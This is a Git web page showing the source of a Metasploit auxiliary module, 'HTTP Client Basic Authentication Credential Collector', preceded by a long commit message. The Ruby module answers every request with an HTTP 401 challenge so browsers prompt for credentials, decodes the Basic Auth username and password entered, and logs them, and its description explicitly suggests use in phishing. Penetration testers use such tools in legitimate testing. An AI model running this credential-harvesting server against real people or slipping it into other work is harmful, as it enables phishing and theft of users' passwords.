adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/modules/auxiliary/server/capture/http_basic.rb
T
Clément Notin 33e35bae7c Add descriptions to auxiliary modules Actions 
And a little formatting
Closes #13403

Update modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/backupexec/dump.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/android/android_stock_browser_iframe.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/admin/tikiwiki/tikidblib.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/smb.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/telnet.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/vnc.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/fakedns.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/tftp.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/gzip_bomb_dos.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/ibm_lotus_notes.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/ibm_lotus_notes2.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/http/webkitplus.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/example.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/android_browser_file_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_lanipleak.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/firefox_pdfjs_file_theft.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/samsung_browser_sop_bypass.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http_basic.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/http_ntlm.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/http_ntlmrelay.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks4a.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks5.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/sip.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/postgresql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/local_hwbridge.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/webkit_xslt_dropper.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/socks_unc.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/client/iec104/iec104.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/drda.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/ftp.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/mssql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/mysql.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/pop3.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/dns/spoofhelper.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/server/capture/printjob_capture.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update description following Actions removal

Update modules/auxiliary/gather/browser_info.rb

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>

Update modules/auxiliary/gather/browser_info.rb

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>
2020-05-17 14:51:14 -05:00

112 lines
3.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'HTTP Client Basic Authentication Credential Collector',
'Description' => %q{
This module responds to all requests for resources with a HTTP 401. This should
cause most browsers to prompt for a credential. If the user enters Basic Auth creds
they are sent to the console.
This may be helpful in some phishing expeditions where it is possible to embed a
resource into a page.
This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.
},
'Author' => ['saint patrick <saintpatrick[at]l1pht.com>'],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Capture', 'Description' => 'Run capture web server' ]
],
'PassiveActions' =>
[
'Capture'
],
'DefaultAction' => 'Capture'
))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])
])
end
# Not compatible today
def support_ipv6?
false
end
def run
@myhost = datastore['SRVHOST']
@myport = datastore['SRVPORT']
@realm = datastore['REALM']
exploit
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def on_request_uri(cli, req)
if(req['Authorization'] and req['Authorization'] =~ /basic/i)
basic,auth = req['Authorization'].split(/\s+/)
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
report_cred(
ip: cli.peerhost,
port: datastore['SRVPORT'],
service_name: 'HTTP',
user: user,
password: pass,
proof: req['Authorization']
)
print_good("HTTP Basic Auth LOGIN #{cli.peerhost} \"#{user}:#{pass}\" / #{req.resource}")
if datastore['RedirectURL']
print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")
send_redirect(cli, datastore['RedirectURL'])
else
send_not_found(cli)
end
else
print_status("Sending 401 to client #{cli.peerhost}")
response = create_response(401, "Unauthorized")
response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
cli.send_response(response)
end
end
end
Reference in New Issue View Git Blame Copy Permalink